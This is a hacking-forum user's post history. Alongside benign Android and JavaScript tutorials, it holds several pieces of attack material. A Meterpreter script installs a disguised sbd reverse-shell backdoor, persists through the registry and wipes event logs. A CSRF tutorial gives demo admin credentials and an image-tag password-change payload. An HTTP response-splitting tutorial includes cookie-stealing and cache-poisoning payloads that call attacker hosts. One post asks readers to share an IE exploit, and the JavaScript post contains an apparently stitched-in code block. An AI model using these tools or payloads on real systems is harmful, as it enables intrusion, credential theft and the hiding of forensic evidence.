Gonzalez

Posts posted by Gonzalez

  1. BitmapDrawables are simply Drawable objects that wrap a bitmap and can be created from file path, input stream, XML inflation from a layout, and bitmaps.

    Building Bitmap Objects

    File

    Use the adb tool with push option to copy test2.png onto the sdcard.

    bash-3.1$ /usr/local/android-sdk-linux/tools/adb push test2.png /sdcard/

    This is the easiest way to load bitmaps from the sdcard. Simply pass the path to the image to BitmapFactory.decodeFile() and let the Android SDK do the rest.

    package higherpass.TestImages;

    import android.app.Activity;
    import android.graphics.Bitmap;
    import android.graphics.BitmapFactory;
    import android.os.Bundle;
    import android.widget.ImageView;

    public class TestImages extends Activity {
        /** Called when the activity is first created. */
        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            ImageView image = (ImageView) findViewById(R.id.test_image);
            Bitmap bMap = BitmapFactory.decodeFile("/sdcard/test2.png");
            image.setImageBitmap(bMap);
        }
    }

    All this code does is load the image test2.png that we previously copied to the sdcard. The BitmapFactory creates a bitmap object with this image and we use the ImageView.setImageBitmap() method to update the ImageView component.

    Input stream

    Use BitmapFactory.decodeStream() to convert a BufferedInputStream into a bitmap object.

    package higherpass.TestImages;

    import java.io.BufferedInputStream;
    import java.io.FileInputStream;

    import android.app.Activity;
    import android.graphics.Bitmap;
    import android.graphics.BitmapFactory;
    import android.os.Bundle;
    import android.util.Log;
    import android.widget.ImageView;

    public class TestImages extends Activity {
        /** Called when the activity is first created. */
        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            ImageView image = (ImageView) findViewById(R.id.test_image);
            FileInputStream in;
            BufferedInputStream buf;
            try {
                in = new FileInputStream("/sdcard/test2.png");
                buf = new BufferedInputStream(in);
                Bitmap bMap = BitmapFactory.decodeStream(buf);
                image.setImageBitmap(bMap);
                if (in != null) {
                    in.close();
                }
                if (buf != null) {
                    buf.close();
                }
            } catch (Exception e) {
                Log.e("Error reading file", e.toString());
            }
        }
    }

    This code uses the basic Java FileInputStream and BufferedInputStream to create the input stream for BitmapFactory.decodeStream(). The file access code should be surrounded by a try/catch block to catch any exceptions thrown by FileInputStream or BufferedInputStream. Also when you're finished with the stream handles they should be closed.

    XML inflation

    Bitmaps can be extracted from layouts and views with inflation. Use BitmapFactory.decodeResource(res, id) to get a bitmap from an Android resource.


    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        ImageView image = (ImageView) findViewById(R.id.test_image);
        Bitmap bMap = BitmapFactory.decodeResource(getResources(), R.drawable.icon);
        image.setImageBitmap(bMap);
    }

    First create an ImageView instance containing the ImageView from the layout. Then create a bitmap from the application icon (R.drawable.icon) with BitmapFactory.decodeResource(). Finally set the new bitmap to be the image displayed in the ImageView component of the layout.

    Bitmaps

    The BitmapFactory.decodeByteArray() method of creating bitmaps creates a bitmap from an array of bytes. This is useful when a bitmap has been loaded for another purpose or has been created by the application or other external source.

    package higherpass.TestImages;

    import java.io.BufferedInputStream;
    import java.io.FileInputStream;

    import android.app.Activity;
    import android.graphics.Bitmap;
    import android.graphics.BitmapFactory;
    import android.os.Bundle;
    import android.util.Log;
    import android.widget.ImageView;

    public class TestImages extends Activity {
        /** Called when the activity is first created. */
        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            ImageView image = (ImageView) findViewById(R.id.test_image);
            FileInputStream in;
            BufferedInputStream buf;
            try {
                in = new FileInputStream("/sdcard/test2.png");
                buf = new BufferedInputStream(in);
                byte[] bMapArray = new byte[buf.available()];
                buf.read(bMapArray);
                Bitmap bMap = BitmapFactory.decodeByteArray(bMapArray, 0, bMapArray.length);
                image.setImageBitmap(bMap);
                if (in != null) {
                    in.close();
                }
                if (buf != null) {
                    buf.close();
                }
            } catch (Exception e) {
                Log.e("Error reading file", e.toString());
            }
        }
    }

    As with the decodeStream() example we open the file in an input stream. This time though we go the extra mile and manually read the file into a byte array. This isn't the best way to do this if you haven't noticed, but it's a simple way to show the functionality. Use the BitmapFactory.decodeByteArray() method to create the bitmap. This function expects 3 parameters, the byte array, the array offset to start from, and the array offset to stop at.

  2. Basic Android Image Information

    Android supports 3 common image formats, PNG, JPG and GIF, along with 9-patch PNG images. Images are stored in the directory res/layout/drawable. As of version 1.6 of the Android SDK, multiple drawable directories exist for different screen resolutions. There are low, medium, and high DPI specific directories: drawable-ldpi, drawable-mdpi and drawable-hdpi respectively. This allows you to create images at different DPI to enhance the appearance of your application. All image filenames should be lowercase and only contain letters, numbers, and underscores.

    Create a new project in Eclipse called TestImages.

    Displaying An Image

    The ImageView layout component is the base element used for displaying images in Android. Download this image and copy it into res/layout/drawable-mdpi in your project. We're simply going to use a screenshot of the emulator.

    <ImageView
        android:id="@+id/test_image"
        android:src="@drawable/test"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        />

    This ImageView loads the image test that you downloaded. Add this to the res/layout/main.xml file below the TextView.

    package higherpass.TestImages;

    import android.app.Activity;
    import android.os.Bundle;
    import android.widget.ImageView;

    public class TestImages extends Activity {
        /** Called when the activity is first created. */
        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            // Look up the ImageView declared in res/layout/main.xml.
            ImageView image = (ImageView) findViewById(R.id.test_image);
        }
    }

    All that was added to the default code is how to get the ImageView component from the layout and store it in a variable. We'll do more with this in the next examples.

    Changing The Image

    Changing the image is done by creating an ImageView object for the image component to change and calling the setImageResource() method. Instead of using resources, a custom bitmap can also be used by invoking setImageBitmap(). We'll get to bitmaps next. Download this second image and store it as test2.png in res/layout/drawable-mdpi.

    package higherpass.TestImages;

    import android.app.Activity;
    import android.os.Bundle;
    import android.widget.ImageView;

    public class TestImages extends Activity {
        /** Called when the activity is first created. */
        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            ImageView image = (ImageView) findViewById(R.id.test_image);
            image.setImageResource(R.drawable.test2);
        }
    }

    Here we simply store the ImageView in the image variable and use the setImageResource() method to point the ImageView at the second image.

  3. In JavaScript, setTimeout() is a method of the window object for timing events. It is used to trigger a function or an expression after a specified number of milliseconds. It returns a numeric timeout ID that can be cancelled with the clearTimeout() method.

    Syntax

    var t = setTimeout("javascript expression", milliseconds);
    clearTimeout(t); //cancel the setTimeout() ID t

    Typical Use

    Set a delay on a JavaScript expression.

    var t = setTimeout("alert('Hello!')", 1000);

    Set a delay on a JavaScript function. The setTimeout call is usually at the end of the statements within the function.

    var t;
    function movee() {
        var elem = document.getElementById("box");
        var spot = parseInt(elem.style.top);
        if (spot < 580) {
            spot += 16;
            elem.style.top = spot + "px";
        }
        t = setTimeout(movee, 100);
    }

    document.getElementById('box').style.top = '180px'; // Reset
    clearTimeout(t); // clear the setTimeout ID

    When the movee() function is triggered, the event keeps running until the setTimeout ID is cleared by the clearTimeout() method, even though you reset the div box to its start position. To clear the setTimeout ID outside the function, make sure the setTimeout ID is a global variable.

    A Wrong Use

    The example below gives a common wrong use of the setTimeout() method. The variable str is a local variable, while the expression alert(str) is evaluated in global scope. Hence, it cannot see the local variable str.

    function foo() {
        var str = "hello";
        setTimeout("alert(str);", 1000);
    }

    foo(); // returns str is undefined.

    When setTimeout is used in a JavaScript object, the meaning of the keyword this will change in the method containing setTimeout, because the setTimeout() method changes the context to global scope, and this will stand for the window object rather than the object instance. So the example below uses a global property _this to keep it consistent.


    function div(id) {
        this.id = id;
        this.t = 0;
    }

    div.prototype = {
        _this : "",
        init: function() {
            _this = this;
        },

        move: function() {
            var elem = document.getElementById(_this.id);
            var spot = parseInt(elem.style.top);
            if (spot < 1700) {
                spot += 16;
                elem.style.top = spot + "px";
            }
            _this.t = setTimeout(_this.move, 100);
        }
    };

    var m = new div("box1");
    m.init();
    m.move();

    Object Bind method

    The use of _this makes it possible for the div object to be referred to in setTimeout. A more generic way of keeping the this keyword consistent is using an extended Bind method. To distinguish it from the similar bind method used for the Function object, here I use a capital initial letter B. The Bind method uses the apply method to return a method / function with its this keyword consistent with the object invoking it.

    div.prototype = {
        move: function() {
            var closure = this.Bind(this.move);
            var elem = document.getElementById(this.id);
            var spot = parseInt(elem.style.top);
            if (spot < 1600) {
                spot += 16;
                elem.style.top = spot + "px";
            }
            this.t = setTimeout(closure, 100);
        },

        Bind: function(Method) {
            var _this = this;
            return (
                function() {
                    return (Method.apply(_this, arguments));
                }
            );
        }
    };
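    The same box-moving loop, reworked as an added example (not code from the original post) so it runs in Node without a DOM: the timer is injected so a test can drive the ticks, the position lives in a field instead of elem.style.top, and Bind is the post's apply-based wrapper. FakeTimer, Mover, runTicks and detachedCall are names assumed here.

```javascript
"use strict";
// Added example, not from the original post. A fake timer stands in for
// window.setTimeout/clearTimeout so the loop can be stepped deterministically.
function FakeTimer() {
  this.queue = [];   // pending { id, fn } entries, in scheduling order
  this.nextId = 1;
}
FakeTimer.prototype.setTimeout = function (fn, ms) {
  var id = this.nextId++;
  this.queue.push({ id: id, fn: fn });
  return id;         // numeric ID, as the real API returns
};
FakeTimer.prototype.clearTimeout = function (id) {
  this.queue = this.queue.filter(function (e) { return e.id !== id; });
};
FakeTimer.prototype.runNext = function () {
  var e = this.queue.shift();
  if (e) e.fn();     // invoked with no receiver, exactly like a real timer
  return !!e;
};

// Mover plays the role of the post's div object; spot replaces elem.style.top.
function Mover(id, timer, limit) {
  this.id = id;
  this.timer = timer;
  this.limit = limit;
  this.spot = 0;
  this.t = 0;        // the pending timeout ID, as in the post
  this.steps = 0;
}

// The post's Bind: the returned closure always calls Method with `this`
// fixed to the object Bind was called on, whatever receiver the timer uses.
Mover.prototype.Bind = function (Method) {
  var _this = this;
  return function () {
    return Method.apply(_this, arguments);
  };
};

// One animation step; returns the new position.
Mover.prototype.move = function () {
  if (this.spot < this.limit) this.spot += 16;
  this.steps += 1;
  // Scheduling this.move directly would lose `this` on the next tick;
  // the bound closure (or the built-in this.move.bind(this)) keeps it.
  this.t = this.timer.setTimeout(this.Bind(this.move), 100);
  return this.spot;
};

// The post's "Reset" plus clearTimeout, so the loop really stops.
Mover.prototype.stop = function () {
  this.timer.clearTimeout(this.t);
  this.spot = 0;
};

// Start the loop and run it for n ticks; returns the final position.
function runTicks(mover, n) {
  mover.move();
  for (var i = 1; i < n; i++) mover.timer.runNext();
  return mover.spot;
}

// Reproduce the bug the post warns about: call move() the way an unbound
// timer callback would be called, with no receiver. Returns what happened.
function detachedCall(mover) {
  var unbound = mover.move;
  try {
    unbound();       // `this` is undefined here, so this.spot throws
    return "no error";
  } catch (e) {
    return e instanceof TypeError ? "TypeError" : "other";
  }
}
```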

  4. Just got an email from Microsoft Technet (stupid win 7 beta) with some interesting info on a remote code execution that they are now patching, so people who don't pay attention to Microsoft updates (like I used to) are still vulnerable.

    Cumulative Security Update for Internet Explorer (978207)

    General Information

    Executive Summary

    This security update resolves seven privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The more severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

    This security update is rated Critical for all supported releases of Internet Explorer: Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and Internet Explorer 8 (except Internet Explorer 6 for supported editions of Windows Server 2003). For Internet Explorer 6 for supported editions of Windows Server 2003 as listed, this update is rated Moderate. For more information, see the subsection, Affected and Non-Affected Software, in this section.

    The security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, validates input parameters, and filters HTML attributes. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.

    This security update also addresses the vulnerability first described in Microsoft Security Advisory 979352.

    Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.

    For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.

    See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.

    Known Issues. None

    Source

    http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx

    Also be sure to check the link to see all of the copies of internet explorer that are vulnerable and if anyone has an exploit, feel free to share

  5. sbd.rb uploads sbd.exe, which runs as svchost.exe with the settings that are entered by the attacker.

    It autoruns via registry and autostarts as the script is run, then clears system logs. Remember it is a modded netcat for a reverse shell; it needs some more edits to the script to hide the reg a little better, but this will do till update time.

    session = client
    host,port = session.tunnel_peer.split(':')
    #Menu-Options
    @@exec_opts = Rex::Parser::Arguments.new(
    "-r" => [ true, "Resporn time limit." ],
    "-p" => [ true, "Port Number to open." ],
    "-k" => [ true, "Authentication name."],
    "-h" => [ true, "Local ip address."]
    )
    def usage
    print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
    print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
    print_line("####################################################")
    print(@@exec_opts.usage)
    raise Rex::Script::Completed
    end

    #Files to upload to target host
    ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
    #Function to upload files
    def upload(session,file)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    fileontrgt = "#{location}\\#{"svhost"}.exe"
    print_status("Uploading #{file}....")
    session.fs.file.upload_file("#{fileontrgt}","#{file}")
    print_status("#{file} Uploaded!")
    return fileontrgt
    end

    #Function to execute sbd
    def sbdrun(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Local Ip Sbd Will Connect Back On: #{ip}")
    print_status("Local Port Sbd Will Connect Back On: #{port}")
    print_status("Pass Phrase: #{auth}")
    print_status("Respawn Time: #{time}")
    end
    #Function to add registry for sbd
    def regadd(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    print_status("Adding to Registry ...")
    session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Successfully added to Registry ...")
    end
    def clrevtlgs(session)
    evtlogs = [
    'security',
    'system',
    'application',
    'directory service',
    'dns server',
    'file replication service'
    ]

    begin
    evtlogs.each do |evl|
    log = session.sys.eventlog.open(evl)
    log.clear
    end
    rescue ::Exception => e
    print_status("Error clearing Event Log: #{e.class} #{e}")

    end
    end

    #Menu-Input
    time = nil
    port = nil
    ip = nil
    auth = nil
    @@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-r"
    time = val
    when "-p"
    port = val
    when "-h"
    ip = val
    when "-k"
    auth = val
    end

    }
    if port

    upload(session,ncexe)
    sbdrun(session,time,auth,port,ip)
    regadd(session,time,auth,port,ip)
    clrevtlgs(session)
    else
    usage
    end

    Video:

    http://www.youtube.com/watch?v=imFAm3AxOuc

  6. BackTrack 4 Final was launched a few weeks back with a better compilation of security tools and bugfixes. For those who have never heard of BackTrack, you might want to start by reading up on the history and purpose of this Linux distro.

    Here is a simple HOWTO guide which I compiled while installing BT4 into my VMWare Workstation.

    PART 1 : Setting Up The VM

    * VMWare Workstation > File > New > Virtual Machine.

    * Select Typical (Recommended) configuration > Next.

    * Select the iso file > Guest Operating System : Linux Operating System > Version : Other Linux 2.6.x kernel.

    * Name the VM as BackTrack.

    * Allocate 8GB of disk space > Set it as Store Virtual Disk as a single file > Click on Finish when you are ready.

    PART 2 : The Installation

    * Boot up the image.

    * Select Start BackTrack FrameBuffer (1024 x 768).

    * BT4 starts initializing files and configurations.

    * At the root prompt, type in “startx” no quotes and press enter to access the desktop.

    (You are currently in Live CD mode and the installation has yet to take place)

    * Once you have the desktop, double click on install.sh and that will kick start the installation.

    The installation begins by asking you for your regional settings. Select as appropriate and follow through the on screen instructions.

    Once the installation completes, it will prompt you for a restart. Just proceed! BackTrack should now be up and running. Have fun.

  7. I've recently been doing some research into distributed computing, specifically distributed password cracking. NetCrack only cracks MD5 and SHA-1 to date, but I think it's a very promising project.

    NetCrack is cluster software developed to distribute the work of cracking a hashing algorithm using a brute force attack.

    NetCrack works like a client/server application, where the server is unique for each cluster network and its job is to distribute the cracking work, coordinate the nodes and prevent connection and data integrity errors.

    Using a TCP/IP based protocol to establish and manage the connection, NetCrack widens its domain to the entire web, avoiding complexity in terms of network implementation and cost, allowing any system to contribute.

    The protocol has been made simple and universal to facilitate future support and to allow the coding of alternate client software in any programming language.

    Site:

    http://www.salvatorefresta.net/?opt=tools

    Download:

    http://www.salvatorefresta.net/files/tools/NetCrack-1.0.tar.gz

    -Gonzalez

  8. Author: Connection

    What is CSRF?

    ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

    CSRF (Cross-Site Request Forgery) is a vulnerability found in web applications which allows a remote attacker to create a special web page or email which, when viewed by an authenticated viewer on a remote site, will execute a particular script. The script executed could range from creating usernames with administrative access, changing the admin's (or any other user's) password, creating content on the site, deleting content on the site, and any other action that a user with an authenticated session might be able to do.

    How do I find CSRF Vulnerabilities?

    ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

    This is an interactive tutorial on finding CSRF vulnerabilities using a demo CMS from http://demo.opensourcecms.com. At the time of this writing the vulnerability exists on Dubsite CMS 1.0, but the vendor has been alerted to this and thus I cannot verify that at the time this is read the vulnerability will still exist. The tools I use to find CSRF vulnerabilities are the Firefox web browser, the Tamper Data Firefox plug-in, and Notepad++ (or any other text editor).

    Step 1: visit

    http://demo.opensourcecmd.com/dubsite/index.php/login

    and login with the following credentials:

    Username: admin
    Password: demo123

    Step 2: Navigate to the user control panel of the admin page located at http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts

    Step 3: We are now going to attempt to modify the administrator's password. Click on edit and fill in the data you want. Before you click submit, start tamper data to sniff the requests.

    Now make a note of the parameters passed to the website. Mine look like this:

    file.php?id=1&sid=babd022ae6e4a226fe2fdff8765d5af2

    The stuff we are interested in is the URL up top and all the POST parameters in the right window. Open up your favorite text editor and copy down all these values.

    Step 4: Here comes the fun part, we are going to create our evil URL. We have to combine our base url with our post parameters.

    Our base URL is the URL we copied from tamper data. In this case our base URL is :

    http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1

    When we append POST parameters to a base URL we start with adding a ? to the base URL and then combine parameters by linking them with a &. An example is http://base.url/goes/here?first=parameter&second=parameter

    A more specific example is for our Dubsite CMS base URL:

    http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update

    As you can see we send the data back to the server the same way our browser sent it. This example URL will edit the administrator account's password and change it to test123.

    Step 5: Now we have a few methods of getting the authenticated administrator to execute this command. First of all we could make a website and set it like this:

    <html>
    <head>
    </head>
    <body>
        <img src="http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update" />
    </body>
    </html>

    When the web browser views the page it will send the link to the admin's site trying to get the information for the image which will in turn execute the change password feature.

    Another way to get the admin to execute the command is to email the admin with the <img> tag trick in the body of the email. Opening the email will cause the server to try to grab the image and will execute the change password function.

    Conclusion

    ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

    CSRF vulnerabilities could cause a lot of harm to a system admin because the form does not have some sort of validation token in place to make sure the administrator is actually issuing the command. A technique that will stop many attackers is to add HTTP_REFERER checking to the page with the form. Coming from an email or other website, the request for the form will be either blanked out or wrong and thus tip off the admin to what is going on. Combined with session tokens for making sure each visit to the form is unique, this will stop attackers from attacking your site via CSRF techniques.

    Bonus Points

    ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

    The create user function is also vulnerable to CSRF attacks. For more practice try to exploit it and create your own administrator user.

  9. Author: Raimond

    HTTP Splitting Tutorial

    Contents

    1.0 What is HTTP Splitting

    2.0 Attack Methodology

    2.1 Vulnerable Scripts

    2.2 Attack Payloads

    3.0 Securing Code

    4.0 End

    1.0 What is HTTP Splitting

    HTTP Splitting (or HTTP Response Splitting) is a method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol.

    HTTP Splitting occurs when an attacker inputs arbitrary headers to control the server response.

    It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks.

    2.0 Attack Methodology

    To perform an HTTP splitting attack the CR (Command Return, also represented by %0d and \r) and LF (Line Feed, also represented by %0a and \n) characters must be used to forge the server's response by injecting headers. Here is an example of a normal request to an example login script:

    Request:

    POST /login.php HTTP/1.1
    Host: site.com
    User-Agent: Mozilla/5.06
    Accept: text/html
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.site.com/login.php
    Cookie: test_cookie=1234
    Content-Type: text/html
    Content-Length: 98

    username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2F

    Response:

    HTTP/1.x 302 Found
    Location: http://www.site.com/admin/
    Date: Tue, 29 Dec 2009 16:12:01 GMT
    Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
    X-Powered-By: PHP/5.2.6
    Set-Cookie: test_cookie=1234; path=/
    Last-Modified: Tue, 29 Dec 2009 16:12:01 GMT
    Keep-Alive: timeout=1, max=10000
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    Now, the part of the request we are interested in is the post content (It is URL encoded. You can decode it for better viewing at http://meyerweb.com/eric/tools/dencoder/):

    username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2F

    Notice the redirect parameter. This parameter is put into the server's response headers:

    HTTP/1.x 302 Found
    Location: http://www.site.com/admin/ <--- User Input

    We can use this to our advantage by modifying the redirect parameter.

    2.1 Vulnerable Scripts

    As you already know, any script that uses user input in the server's response headers is vulnerable. Many web services do this in the form of a redirect and, in some cases, setting a cookie.

    Below are two vulnerable code examples.

    Setting Cookies in PHP:

    <?php
    $name = $_GET['name'];
    $session = "sup3rs3cr3tsessiondata";
    setcookie("session", $session);
    setcookie("name", $name);
    ?>

    User's Request:

    http://www.site.com/setcookie.php?name=Raimond

    Server's Response:

    HTTP/1.1 200 OK
    Content-type: text/html
    Set-Cookie: session=sup3rs3cr3tsessiondata; name=Raimond <--- User Input

    Redirecting in PHP:


    <?php
    header("Location: " . $_GET['page']);
    ?>

    User's Request:

    http://www.site.com/redirect.php?page=http://www.newsite.com

    Server's Response:

    HTTP/1.x 302 Found
    Location: http://www.newsite.com/ <--- User Input

    We will cover attacking these scripts in the next section.

    I encourage you to install a web server (I run apache) and run these scripts to get a better understanding of HTTP Splitting. Note that PHP 5.1.2+ has been secured against HTTP Response Splitting thanks to the PHP Hardening Project! (Asp and other server languages are still vulnerable)

    2.2 Injecting Payloads

    Ok. Let's move on to injecting our headers. To create a new response we can fully control, we must end the genuine response by using Content-Length: 0. If you know anything about HTTP you know that Content-Length: 0 tells the browser that there is nothing left to read (no HTML to parse) from the server's response. We can inject our Content-Length by using one set of raw CRLF symbols. Here is an example.

    Normal Request

    http://www.site.com/redirect.php?page=Content-Length%3a%200

    1njected!

    http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200

    (This is URL encoded. Use URL Decoder/Encoder to decode it.)

    %0d%0aContent-Length%3a%200 is the same as \r\nContent-Length: 0.

    The \r\n (or %0d%0a in URL encoding) are the CR and LF characters. Think of these characters as the "\n" character in C++ or the result of pressing enter on your keyboard while running a word processor. Here is an example of what happens in the HTTP response after submitting a normal request and an injected request.

    Normal Response

    HTTP/1.1 302 Found
    Location: Content-Length: 0

    Injected!

    HTTP/1.1 302 Found
    Location:(our CRLF characters made a newline)
    Content-Length: 0

    Now we can start a forged HTTP response!

    http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type%3a%20text/html%0d%0aContent-Length%3a%2020%0d%0a%0d%0a%3Chtml%3EHacked%3C%2Fhtml%3E

    (Again this is encoded. Decode it for better viewing.)

    Response (\r\n represents where we injected the %0d%0a CRLF characters)

    HTTP/1.1 302 Found
    Location:\r\n
    Content-Length: 0\r\n
    \r\n
    HTTP/1.1 200 OK\r\n
    Content-Type: text/html\r\n
    Content-Length: 20\r\n
    \r\n
    <html>Hacked</html>

    OK! We can change the server's response! What's so great about this? Well, with HTTP Response Splitting we can deliver many attack payloads, which I will cover in the next section.

    XSS And Other Client Side Attacks

    Well this should be straight forward. Just replace "<html>Hacked</html>" in the previous example with your attack payload. Don't forget to change the Content-Length to the length of your payload.

    Cookie Stealing Payload

    http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%20120%0D%0A%0D%0A%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.cookiejar.com%2Fcookies.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E%0A

    HTTP Response

    HTTP/1.1 302 Found
    Location:\r\n
    Content-Length: 0\r\n
    \r\n
    HTTP/1.1 200 OK\r\n
    Content-Type: text/html\r\n
    Content-Length: 120\r\n
    \r\n
    <script>document.location="http://www.cookiejar.com/cookies.php?cookie="+document.cookie;</script>

    If you don't understand this script you need to learn XSS. Of course other client side attacks such as phishing, forging pages, internal scanning/discovery, CSRF can be executed through HTTP Splitting.

    Cache Poisoning

    Before I explain cache poisoning I will explain how web caches work. The web cache is a storage bank for web pages and pictures. By using a web cache the user doesn't have to reconnect to the server every time they revisit a page. The user's browser can just grab the saved page from the local cache as long as the server doesn't report that there is a newer version of the page available (if the page has been modified, the browser will grab the new version of the page). So here's the scenario: you log in to your homepage and your browser caches it. The page's response headers look like so:

    HTTP/1.x 302 Found
    Location: http://www.site.com/user/home.htm
    Last-Modified: Tue, 29 Dec 2009 16:00:00 GMT
    Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
    X-Powered-By: PHP/5.2.6
    Set-Cookie: test_cookie=1234; path=/
    Keep-Alive: timeout=1, max=10000
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Content-Length: 200

    <html>[Content Here]</html>

    Note the Last-Modified header!

    Then the next day you log in and the response looks like so:

    HTTP/1.x 302 Found
    Location: http://www.site.com/user/home.html
    Last-Modified: Wed, 30 Dec 2009 12:00:00 GMT
    Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
    X-Powered-By: PHP/5.2.6
    Set-Cookie: test_cookie=1234; path=/
    Keep-Alive: timeout=1, max=10000
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Content-Length: 200

    <html>[Content Here]</html>

    The Last-Modified header has been changed to a later date, thus your browser updates its cache with the new page. We can exploit this behavior by setting the Last-Modified date to a date in the far future (Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT). By doing so the browser will cache the page and not update it until the date on the Last-Modified header or until the cache is cleared! We can use HTTP Splitting to forge a page and control it every time the user browses to it!

    Cache Poisoning Request

    http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Sun%2C%201%20Jan%202050%2012%3A00%3A00%20GMT%0D%0AContent-Length%3A%20100%0D%0A%0D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fevil.js%22%3E%3C%2Fscript%3E%0D%0A

    Response (Don't forget \r\n stands for the CRLF or %0d%0a characters we injected)

    HTTP/1.1 302 Found
    Location:\r\n
    Content-Length: 0\r\n
    \r\n
    HTTP/1.1 200 OK\r\n
    Content-Type: text/html\r\n
    Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT\r\n
    Content-Length: 100\r\n
    \r\n
    <script src="http://www.evilsite.com/evil.js"></script>

    Note the Last-Modified header. Since we set the Last-Modified header to a future date (40 years from now) the browser will not update its cache until then or until the cache is cleared! Every time the victim visits the injected page our payload will execute. The payload in this example is a remote JS file. The remote JS file can be coded to do anything the attacker wants. An ideal attack would be to launch an XSS shell and perform further attacks from there.

    Since we control data on the page we can forge data, phish credentials, and copy the html contents! Many more client-side attacks can be executed because of the control we have over the html.

    This ends the Attack Payloads section. Remember to think outside the box when performing HTTP Splitting. Many things can be done with it!

    3.0 Securing Code

    Securing in PHP:

    Upgrade to newest version Wink!

    Securing in ASP:

    Use EnableHeaderChecking Property to encode the CR and LF characters.
